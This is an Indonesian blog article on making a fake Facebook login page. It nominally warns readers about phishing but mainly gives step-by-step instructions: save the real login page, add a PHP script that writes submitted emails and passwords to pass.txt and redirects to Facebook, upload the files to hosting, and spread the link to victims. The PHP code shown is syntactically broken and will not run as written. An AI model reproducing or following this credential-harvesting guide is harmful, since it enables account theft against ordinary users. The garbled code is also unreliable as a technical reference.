Cara Hack FB dengan Link palsu 2022

Cara Hack FB dengan Link Palsu
Cara Hack FB dengan Link Palsu - Semua orang pastinya takut, jika akun Facebooknya di kontrol oleh orang lain itupun tidak kita kenal.

Apa bila akun anda di kontrol oleh orang tidak kita kenal, pastinya akan membagikan informasi yang tentu saja tidak kita inginkan termasuk semua informasi ataupun foto yang telah anda posting.

Bisa jadi akan di curi dan juga di sebar luaskan, apa lagi dizaman seperti ini ada banyak sekali cara yang meraka gunakan untuk dapat mencuri segala data-data dan juga informasi akun FB anda.

Termasuk dengan membuat halaman login palsu, dimana para hacker akan mengirimkan link ke anda dalam hal ini akan mengatas namakan Facebook.

Bahkan berbagai macam cara, agar anda mengklik link palsu itu dari situlah para hacker akan mengambil alih Facebook anda dan mencuri semua informasi data-data anda.


Maka dari itu, supaya anda juga tidak kejebak dengan hal seperti sebaiknya anda harus mempelajari cara hack Facebook dengan menggunakan link palsu tersebut.

Untuk lebih jelasnya, diartikel kali ini kami akan membagikan informasi seputar cara hack FB dengan link palsu tentu saja anda simak ulasan sebagai berikut ini.


Cara Hack FB dengan Link Palsu


Cara Hack FB dengan Link Palsu

Cara Hack FB dengan Link Palsu
Cara Hack FB dengan Link Palsu
Apa lagi hanya memakai tampilan login Facebook palsu, maka para hacker akan dengan mudahnya mengambil alih segala data yang sudah anda input ke hosting file milik mereka.

Dari situlah data beserta email dan juga password anda akan di simpan, sebab mereka dengan gampangnya masuk ke akun Facebook anda.


Berikut cara hack FB dengan link palsu:
  • Silahkan anda kunjungi melalui link berikut ini (http://www.facebook.com/login.php/), setelah itu anda simpan laman tersebut lalu anda tinggal klik kanan Save As.
  • Pasalnya file yang telah anda unduh barusan, terdapat di file Masuk Facebook _ Facebook.html dan juga folder Masuk Facebook _ Facebook _ Files anda dapat menimpa file masuk dengan Facebook _ Facebook _ file dengan file yang tentunya sama setelah di perbarui.
  • Selanjutnya anda buat file next.php, setelah itu anda copy paste code sebagai berikut ini ke dalam Notepad ataupun aplikasi text editor sekelasnya. Apa bila sudah disimpan dengan memakai nama next.php.
<?php
header('Location: http://www.Facebook.com/login.php').
$handle = fopen('pass.txt', 'a');
foreach($handle, $variable);
fwrite($handle, '=')'
fwrite($handle, $value);
fwrite($handle, '\n’);
]
fwrite($handle, '\n’);
fclose($handle);
exit;
?>

  • Lalu anda buat file kosong dengan memakai Notepad beserta nama Pass.txt. File tersebut dipakai untuk bisa menampung email dan juga password Facebook orang lain.
  • Apa bila semua file sudah siap anda bentuk, maka selanjutnya tugas anda yakni dengan mengunggah semua file ke dalam layanan file hosting milik anda. Setelah itu, semua isi dari file yang akan di unggah yakni Masuk Facebook_Facebook-Files dan Masuk Facebook_Facebook.html serta anda mengunduh next.php dan juga Rass.text.
  • Jika tugas anda sudah selesai, setelah itu anda sebarkan semua link Login Facebook palsu yang anda buat barusan.
  • Kalau anda yang masuk ke jebakan dengan menggunakan login palsu yang anda buat tadi, email dan juga password akan segera masuk ke laman Pass.txt yang telah anda buat.


Akhir Kata

Gimana mudahkan? Cukup dengan file hosting, maka para peretas bisa dengan mudah mengakses akun Facebook anda oleh sebab itu anda harus berhati-hati pada saat login.

Apa lagi sampai mengklik link seberangan, tanpa memeriksa alamat dari URL-nya sebab itu adalah salah satu cara para hacker memperoleh alamat email dan juga password.

Oleh sebab itu, anda harus berhati-hati di zaman seperti ini jangan sampai anda salah satu di antaranya yang jadi korban link palsu diberikan para hacker.

Itulah seluruh isi artikel kita kali ini mengenai cara hack FB dengan link palsu. Sekian dan semoga bermanfaat.
Dody S. Praktisi teknologi, editor dan jurnalis di 1001Media.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel